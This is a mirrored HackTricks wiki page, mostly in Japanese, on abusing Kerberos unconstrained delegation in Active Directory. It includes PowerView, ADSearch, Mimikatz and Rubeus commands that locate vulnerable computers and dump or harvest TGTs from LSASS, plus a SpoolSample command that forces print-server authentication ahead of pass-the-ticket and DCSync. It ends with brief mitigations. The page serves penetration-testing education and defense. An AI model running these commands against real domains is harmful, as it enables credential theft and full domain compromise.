maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/windows-hardening/active-directory-methodology/unconstrained-delegation.md

54 lines
4.1 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Unconstrained Delegation
{{#include ../../banners/hacktricks-training.md}}
## Unconstrained delegation
これは、ドメイン管理者がドメイン内の任意の**コンピュータ**に設定できる機能です。次に、**ユーザーがコンピュータにログイン**すると、そのユーザーの**TGTのコピー**がDCによって提供される**TGS内に送信され**、**LSASSのメモリに保存されます**。したがって、マシン上で管理者権限を持っている場合、**チケットをダンプしてユーザーを偽装する**ことができます。
したがって、ドメイン管理者が「Unconstrained Delegation」機能が有効なコンピュータにログインし、あなたがそのマシン内でローカル管理者権限を持っている場合、チケットをダンプしてドメイン管理者をどこでも偽装することができますドメイン特権昇格
この属性を持つコンピュータオブジェクトを**見つける**には、[userAccountControl](<https://msdn.microsoft.com/en-us/library/ms680832(v=vs.85).aspx>)属性が[ADS_UF_TRUSTED_FOR_DELEGATION](<https://msdn.microsoft.com/en-us/library/aa772300(v=vs.85).aspx>)を含んでいるかどうかを確認します。これは、‘(userAccountControl:1.2.840.113556.1.4.803:=524288)というLDAPフィルターを使用して行うことができ、これがpowerviewが行うことです
<pre class="language-bash"><code class="lang-bash"># List unconstrained computers
## Powerview
Get-NetComputer -Unconstrained #DCs always appear but aren't useful for privesc
<strong>## ADSearch
</strong>ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
<strong># Export tickets with Mimikatz
</strong>privilege::debug
sekurlsa::tickets /export #Recommended way
kerberos::list /export #Another way
# Monitor logins and export new tickets
.\Rubeus.exe monitor /targetuser:<username> /interval:10 #Check every 10s for new TGTs</code></pre>
**Mimikatz**または**Rubeus**を使用して、管理者(または被害者ユーザー)のチケットをメモリにロードします。**[Pass the Ticket](pass-the-ticket.md)**。\
詳細情報:[https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/](https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/)\
[**Unconstrained delegationに関する詳細情報はired.teamをご覧ください。**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-unrestricted-kerberos-delegation)
### **Force Authentication**
攻撃者が「Unconstrained Delegation」を許可されたコンピュータを**侵害する**ことができれば、**プリントサーバー**を**自動的にログイン**させて**TGTをメモリに保存**させることができます。\
その後、攻撃者は**チケットをパスして**プリントサーバーのユーザーコンピュータアカウントを偽装することができます。
プリントサーバーを任意のマシンにログインさせるには、[**SpoolSample**](https://github.com/leechristensen/SpoolSample)を使用できます:
```bash
.\SpoolSample.exe <printmachine> <unconstrinedmachine>
```
TGTがドメインコントローラーからのものであれば、[ **DCSync attack**](acl-persistence-abuse/index.html#dcsync)を実行して、DCからすべてのハッシュを取得することができます。\
[**この攻撃に関する詳細はired.teamで。**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-dc-print-server-and-kerberos-delegation)
**認証を強制するための他の方法は次のとおりです:**
{{#ref}}
printers-spooler-service-abuse.md
{{#endref}}
### Mitigation
- DA/Adminのログインを特定のサービスに制限する
- 特権アカウントに対して「アカウントは機密であり、委任できません」を設定する。
{{#include ../../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink